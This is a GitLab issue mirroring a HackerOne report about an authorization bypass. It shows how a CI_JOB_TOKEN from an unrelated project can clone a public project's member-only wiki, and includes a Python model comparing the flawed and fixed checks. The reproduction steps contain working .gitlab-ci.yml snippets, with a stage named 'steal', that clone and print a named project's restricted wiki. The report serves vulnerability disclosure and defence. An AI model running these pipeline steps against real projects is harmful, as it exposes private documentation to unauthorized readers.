Backend: Able to git clone the wiki despite the Only Project Members setting
HackerOne report #1075586 by shells3c
on 2021-01-10, assigned to @rchan-gitlab:
Report
Summary
There was a mistake while confirming the patch for the Wiki bug in the past report (#887755), and the bug is still there! I am able to git clone a private wiki using the CI_JOB_TOKEN (public project).
Steps to reproduce
- Create a project and set the Wiki visibility to Only Project Members on the settings page: https://gitlab.com/<user>/<project>/edit
- Log in as another user (attacker) and create a .gitlab-ci.yml in an arbitrary project:

```yaml
stages:
  - steal
test:
  stage: steal
  script:
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/company/api.wiki.git'
    - 'cd api.wiki && cat api-doc.md'
```
- In the pipeline output, you will be able to read the wiki content.
Examples
- Can't access this: https://gitlab.com/just4hack2/mypro/-/wikis/home
- Try adding the following to your .gitlab-ci.yml and read the wiki (the clone of mypro.wiki.git lands in a directory named mypro.wiki):

```yaml
stages:
  - steal
test:
  stage: steal
  script:
    - 'git clone http://gitlab-ci-token:$CI_JOB_TOKEN@gitlab.com/just4hack2/mypro.wiki.git'
    - 'cd mypro.wiki'
    - 'ls'
    - 'cat home.md'
```
Impact
Able to read the private Wiki of GitLab projects whose wiki is restricted to project members.
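To make the authorization gap concrete from a defender's view, here is an added Python model of the access decision. It is not GitLab's code: the class names, the JobToken model and the decision logic are assumptions made for the example. It places a check that consults only project visibility (the behaviour this report describes) beside one that also honours the wiki feature's own access level, so that git-over-HTTP access is gated exactly as the web UI is:

```python
"""Simplified model of the wiki git-access authorization flaw in this report.

Constructed illustration, not GitLab's implementation: the enums, the
JobToken model and both decision functions are assumptions for the example.
"""
from dataclasses import dataclass
from enum import Enum


class Visibility(Enum):
    PRIVATE = "private"
    INTERNAL = "internal"
    PUBLIC = "public"


class WikiAccess(Enum):
    """The three choices of the wiki feature setting."""
    DISABLED = "disabled"
    PRIVATE = "private"    # "Only Project Members"
    ENABLED = "enabled"    # "Everyone With Access"


@dataclass(frozen=True)
class Project:
    path: str
    visibility: Visibility
    wiki_access: WikiAccess
    members: frozenset      # usernames with project membership


@dataclass(frozen=True)
class JobToken:
    """A CI_JOB_TOKEN, modelled as bound to the pipeline's project and to
    the user who triggered the pipeline (assumption)."""
    project_path: str
    user: str


def can_clone_wiki_vulnerable(project: Project, token: JobToken) -> bool:
    """Flawed check: only project visibility is consulted, so a job token
    from any other project can clone the wiki of a public project even
    though the wiki feature is restricted to members."""
    if project.visibility is Visibility.PUBLIC:
        return True
    return token.project_path == project.path or token.user in project.members


def can_clone_wiki_fixed(project: Project, token: JobToken) -> bool:
    """Corrected check: the wiki feature's access level gates git access
    the same way it gates the web UI."""
    if project.wiki_access is WikiAccess.DISABLED:
        return False
    is_member = token.user in project.members or token.project_path == project.path
    if is_member:
        return True
    # Non-members reach the wiki only when the project is public AND the
    # wiki feature is open to everyone with access.
    return (project.visibility is Visibility.PUBLIC
            and project.wiki_access is WikiAccess.ENABLED)


def demo() -> dict:
    """Replays the report's scenario: public project, wiki set to
    Only Project Members, job token from an unrelated project."""
    # Constructed sample data; 'just4hack2/mypro' is the project named in the report.
    target = Project("just4hack2/mypro", Visibility.PUBLIC,
                     WikiAccess.PRIVATE, frozenset({"just4hack2"}))
    outsider_token = JobToken("someone/unrelated", "someone")
    return {
        "vulnerable": can_clone_wiki_vulnerable(target, outsider_token),
        "fixed": can_clone_wiki_fixed(target, outsider_token),
    }


if __name__ == "__main__":
    print(demo())
```

The design point is that feature-level visibility (wiki, issues, repository) must be enforced in every access path, including the git backend consulted by CI job tokens, not only in the web authorization layer; otherwise a restricted feature stays reachable through the path that forgot to ask.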
How To Reproduce
Please add reproducibility information to this section:
Edited by Mark Nuzzo